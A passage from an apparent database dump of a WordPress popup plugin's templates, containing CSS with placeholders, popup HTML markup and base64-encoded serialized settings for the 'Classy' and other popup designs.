/* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \"Myriad Pro\",\"Trebuchet MS\",\"Helvetica Neue\",Helvetica,Arial,Sans-Serif;\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	text-shadow: 0px 0px 1px #000;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n  background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #d1b36d;\r\n  	border-radius: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background-color: #fff;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -5px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	[if bg_type_2 == \'color\']\r\n  	background: [bg_color_2];\r\n    background: -moz-linear-gradient(90deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_2]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 50%;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	float: right;\r\n    [if enb_txt_0]\r\n    width: 50%;\r\n    [else]\r\n    width: 100%;\r\n    [endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}','',1,1,1,1,0,0,0,'2015-01-10 17:59:43',7,0),(2,'Classy',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjU5OntzOjU6IndpZHRoIjtzOjM6IjYzMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNkMWQxZDEiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjN2ZiNmNiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzU1NTU1NSI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjNTU1NTU1IjtzOjEwOiJmb250X3R4dF8xIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8xIjtzOjc6IiM1NTU1NTUiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM5OTk5OTkiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJjbGFzc3lfZ3JleSI7czo3OiJidWxsZXRzIjtzOjExOiJjbGFzc3lfYmx1ZSI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjg6IlNpZ24tVXAhIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTg6IlBvcFVwIGJ5IFN1cHN5c3RpYyI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjIwODoiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzOjwvcD48dWw+PGxpPlVubGltaXRlZCBDb250ZW50IEN1c3RvbWl6YXRpb248L2xpPjxsaT5BdXRvIE9wZW4gUG9wdXBzPC9saT48bGk+Q29udGFjdCBGb3JtIHdpdGggcG9wLXVwPC9saT48L3VsPiI7czo1OiJ0eHRfMSI7czoxMjM6IjxwPjxpbWcgc3R5bGU9XCJtYXgtd2lkdGg6IDE4MHB4OyBtYXgtaGVpZ2h0OiBhdXRvO1wiIHNyYz1cIltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL3N1cHN5c3RpY19pY29uLnBuZ1wiIGFsdD1cIlwiIC8+PC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMiI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIyIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupClassyShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupClassyInner\">\r\n		[if enb_label]\r\n			<div class=\"ppsPopupLabel ppsPopupClassyLabel\">[label]</div>\r\n		[endif]\r\n		[if enb_txt_0]\r\n		<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupTxt_0\">\r\n			[txt_0]\r\n		</div>\r\n		[endif]\r\n		[if enb_txt_1]\r\n		<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupTxt_1\">\r\n			[txt_1]\r\n		</div>\r\n		[endif]\r\n      	[if enb_sm]\r\n        <div class=\"ppsSm\">\r\n            [sm_html]\r\n        </div>\r\n        [endif]\r\n		<div style=\"clear: both;\"></div>\r\n	</div>\r\n	[if enb_subscribe]\r\n	<div class=\"ppsSubscribeShell\">\r\n		[sub_form_start]\r\n          	[sub_fields_html]\r\n			<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n		[sub_form_end]\r\n	</div>\r\n  	[endif]\r\n  	[if enb_foot_note]\r\n  	<div class=\"ppsFootNote\">[foot_note]</div>\r\n  	[endif]\r\n</div>','#ppsPopupShell_[ID] {\r\n  	width: [width][width_measure];\r\n	[if bg_type_0 == \'color\']\r\n	background-color: {{ popup.params.tpl.bg_color_0 }};\r\n	[elseif bg_type_0 == \'img\']\r\n	background-image: url(\"[bg_img_0]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n	padding: 7px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyInner {\r\n	padding: 15px;\r\n	border: {{ adjust_brightness(popup.params.tpl.bg_color_0, 30) }};\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_0 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_0 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }}\',GradientType=1 ); /* ie6-9 */\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: 48px;\r\n	font-size: 27px;\r\n	border: none;\r\n	padding: 1px 8px 0;\r\n	width: calc((100% - 70px) / 3);\r\n  	box-sizing: content-box;\r\n  	margin-top: 10px;\r\n  	float: left;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	[if bg_type_0 == \'color\']\r\n	-webkit-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	-moz-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	background-color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }};\r\n	color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -100) }};\r\n	[endif]\r\n	margin-right: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n  	display: table-cell;\r\n  	height: 48px;\r\n  	vertical-align: middle;\r\n  	background-color: transparent;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select option {\r\n	font-size: 27px;\r\n  	color: #6d6d6d;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: calc(100% - 30px);\r\n  	height: auto;\r\n  	font-family: inherit;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	color: #eee;\r\n	margin-right: 0;\r\n	cursor: pointer;\r\n	[if bg_type_1 == \'color\']\r\n	text-shadow: -1px -1px 1px {{ adjust_brightness(popup.params.tpl.bg_color_1, -80) }};\r\n	border: 1px solid {{ adjust_brightness(popup.params.tpl.bg_color_1, -40) }};\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_1 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_1 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }}\',GradientType=1 ); /* ie6-9 */\r\n\r\n	-webkit-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	-moz-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	[elseif bg_type_1 == \'img\']\r\n	background-image: url(\"[bg_img_1]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:disabled {\r\n	color: transparent;\r\n  	cursor: progress;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyLabel {\r\n	width: 100%;\r\n	text-align: center;\r\n	color: #555555;\r\n	text-shadow: 1px 1px 1px #ffffff;\r\n	font-size: 35px;\r\n	margin-top: 26px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	color: #555555;\r\n  	border: 1px solid #555555;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	font-size: 20px;\r\n	line-height: 160%;\r\n	color: rgb(85, 85, 85);\r\n	padding-top: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	[if enb_txt_1]\r\n	width: 70%;\r\n  	float: left;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	float: right;\r\n	width: 30%;\r\n}\r\n#ppsPopupShell_[ID] ul {\r\n	margin-top: 15px;\r\n	padding-left: 0;\r\n}\r\n#ppsPopupShell_[ID] ul li {\r\n	list-style: inside none disc;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #999;\r\n    font-size: 12px;\r\n    padding-top: 10px;\r\n    text-align: center;\r\n}\r\n/*SM*/\r\n#ppsPopupShell_[ID] .ppsSm {\r\n	padding: 10px 10px 0 10px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_1_435376 .ppsSm > div {\r\n	vertical-align: top !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm .ppsSmBtn {\r\n	margin-right: 5px;\r\n}','',1,1,1,1,0,0,0,'2015-01-03 16:00:43',19,0),(3,'Fastest and the Easiest',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjYzOntzOjU6IndpZHRoIjtzOjM6Ijc3MCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNlNWU1ZTUiO3M6OToiYmdfdHlwZV8xIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMSI7czozOToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnV0dG9uLTEucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjA6IiI7czo5OiJiZ190eXBlXzIiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18yIjtzOjQyOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9iaWctYXJyb3ctMS5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzQxNDE0MSI7czoxMD